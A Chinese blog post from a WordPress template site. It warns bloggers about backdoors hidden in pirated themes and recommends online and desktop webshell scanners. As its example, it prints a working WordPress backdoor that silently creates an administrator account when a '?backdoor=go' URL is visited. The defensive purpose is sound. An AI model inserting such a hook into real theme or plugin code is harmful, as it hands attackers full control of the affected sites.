mbxzb主题已启用,当前站点还没有验证正版主题授权,暂不可使用 前往授权激活 获取正版授权
网站后门查杀工具推荐 - 模板下载吧

网站后门查杀工具推荐

作为一个小博主,对于博客的后门代码肯定是深恶痛绝的,尤其是在建站初期,因为一些原因而使用非正版主题,很容易出现这个问题,而往往一些不良的代码贩子,总喜欢给自己贩卖的主题等源代码贴上完美绿色、无后门等标签来吸引小博主购买,实际上里面不知道加了多少料,最常见的代码如下:

  1. add_action('wp_head', 'creatbackdoor');
  2. function creatbackdoor() {
  3.         If ($_GET['backdoor'] == 'go') {
  4.                 require('wp-includes/registration.php');
  5.                 If (!username_exists('username')) {
  6.                         $user_id = wp_create_user('username', 'password');
  7.                         $user = new WP_User($user_id);
  8.                         $user->set_role('administrator');
  9.                 }
  10.         }
  11. }

usernamepassword 分别为创建的管理员用户名和密码,所创建的后门地址为:www.yourwebsite.com/?backdoor=go,然后就可以为所欲为了!

当然,后门代码还有很多种,有一些还会经过特殊加密,比如有时候会出现类似 34d1f91fb2e514b8576fab1a75a89a6b 这种乱码,基本就可以断定你的这个主题包加了东西!所以文字咖建议小白博主,这在购买主题或者插件时,尽量不要购买有加密代码的源码,之前网上流传的号称完美开心版的 justnews_5.2.3 和 ripro_4.8 主题基本都有这种肮脏的代码,导致很多小博主的博客数据全丢!

对于非科班出生的小博主,文字咖这里推荐几个网站后门查杀工具

1. 在线扫描

1) 河马在线查杀:http://n.shellpub.com

这个比较方便,支持 zip 文件压缩包直接上传扫描,当然上传的文件大小不能超过 20MB ,同时支持 asp/php/aspx/jsp/perl 等各种脚本。

2) 百度在线查杀:https://scanner.baidu.com

这个比较厉害,支持 zip、rar、tar 等各种常见压缩包,同时支持 php/jsp/asp/aspx 等各种脚本,也支持通过 API 方式进行扫描,文字咖之前一直使用这个,就是速度有点慢。。。

2) CHIP 在线查杀:https://phpchip.com

这个仅支持 PHP 且只能上传单个 PHP 文件进行扫描。

4) 在线 webshell 查杀-灭绝师太版:http://tools.bugscaner.com/killwebshell/

这个目前支持 zip 或 php 文件上传扫描,但是 zip 压缩包大小不能超过 2M。

2. 客户端扫描

1) 河马查杀

河马同时支持 Windows 和 Linux 两种客户端查杀工具,这里有个比较有意思的地方就是,河马查杀新增了一个机器学习查杀引擎,只是目前处于试验阶段,感兴趣的小伙伴可以去体验一下!

2) D 盾防火墙(强烈推荐)

文字咖最喜欢用的就是这个,可以直接在 Windows 的环境下,使用 D 盾将网站源码或疑似木马文件下载回本地扫描,非常快捷方便。

3) WebShellKiller

大名鼎鼎的深信服发布 webshell 查杀工具,也可以在 Windows 环境下直接选择需要扫描的文件夹开始扫描即可,也是非常方便好用的 webshell 查杀工具。

3. 总结

虽然文字咖在这里推荐了几种网站后门查杀工具,但对于那些以正规建站为目的,希望能够做大站长的同学,还是尽量购买正版主题。当然对于那些喜欢折腾的小伙伴,尽量使用非加密的的主题,毕竟某宝等平台上出售的非正版源码存在安全问题的可能性是非常大的,最后总结就是,遇到一些乱码的源码主题不用,多学习,觉得有安全问题就是用文字咖推荐的几种查杀工具检查一下!

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如果您也有好的资源或教程,您可以投稿发布,成功分享后有M币奖励和额外收入!

模板下载吧 Wordpress教程 网站后门查杀工具推荐 https://www.mbxzb.com/blog/wordpress/20192.html

从明天起,做一个幸福的人,喂马、劈柴、周游世界…

常见问题
  • 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承
查看详情
  • 最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用
查看详情

相关文章

评论
暂无评论
点击按钮快速添加回复内容: 支持 高兴 激动 给力 加油 苦寻 生气 回帖 路过 威武 友军 顶贴
官方客服团队

为您解决烦忧 - 24小时在线 专业服务